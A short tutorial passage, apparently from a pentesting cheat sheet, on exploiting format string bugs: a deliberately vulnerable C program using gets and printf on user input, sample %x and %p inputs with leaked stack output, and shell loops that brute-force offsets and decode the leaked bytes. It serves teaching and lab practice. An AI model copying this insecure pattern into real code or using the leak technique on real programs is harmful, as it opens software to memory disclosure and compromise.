If a binary file contains the functionality which reads user input then outputs it, we can abuse format strings.
// example.c
int main()
{
char buffer[12];
gets(buffer);
printf(buffer);
return 0;
}
./example
# Input 1 (read value as hex)
%x
# output
ad8c72a1
# Input 2 (read multiple values as hex)
%x %x %x %x
# output
78252078 0 ceddc980 447c8d80 0
# Input 3 (read offset values as hex)
%1$x
# output
2431
# Input 4 (read offset values as hex)
%2$x
# output
0
# Input 5 (read pointer address)
%p
# output
0x55821afca2a1
# Input 6 (read offset pointer address)
%1$p
# output
2431
This is an example of exploitation with format string.
We can read pointer addresses/values by brute forcing.
# Brute force pointer
for i in {20..-1}; do echo \%$i\$p | ./example; done
# Brute force pointer & cut & hexdump (reverse) & reverse
# cut -c 15-: Select only N characters (e.g. 15 characters)
# xxd -ps: Output in plain hexdump style
# xxd -r: Reverse operation. Convert hexdump into binary
# rev: Reverse lines characterwise
(for i in {11..6..-1}; do echo \%$i\$p | ./example; done) | grep "The result is" | cut -c 15- | xxd -ps -r | rev